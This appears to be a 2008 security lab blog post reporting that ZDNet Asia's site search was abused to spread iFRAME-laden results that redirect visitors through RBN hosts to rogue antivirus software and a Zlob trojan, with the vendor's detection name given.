NEWS FROM THE LAB - Wednesday, March 5, 2008

ZDNet Asia Compromised? Posted by Fei @ 04:28 GMT

ZDNet Asia is one of my bookmarked online resources that I frequently visit. The site is NOT compromised per se; rather, their site's search engine was abused by an attacker with queries of popular keywords. Leveraging on the fact that the site is, legitimate, and has high page ranks, the popular search engines are returning some of these 'iFRAME'ed results in the first few pages of the search results. And the objective? To get the unsuspecting user to click on the link.

ZDNet Asia Search Results

The last time we checked, 20,600 cached pages loading the iFRAME was found. Upon clicking on the malicious link, you get redirected to some Russian Business Network's IPs and RBN is notoriously known for hosting not only malware but also rouge antivirus and antispyware applications. At the end of the redirects, the unsuspecting user might be a victim of a Zlob trojan.

We detect it as Trojan-Downloader:W32/Zlob.HOG.

Signing off,

Update: This information was first posted on Dancho's blog and he obviously deserves credit. When we last checked on the situation this morning, it seems that we found 18,400 "new" cached pages appearing with the iFrame, which are now redirecting users to a different domain.

ZDNet Asia Search Results New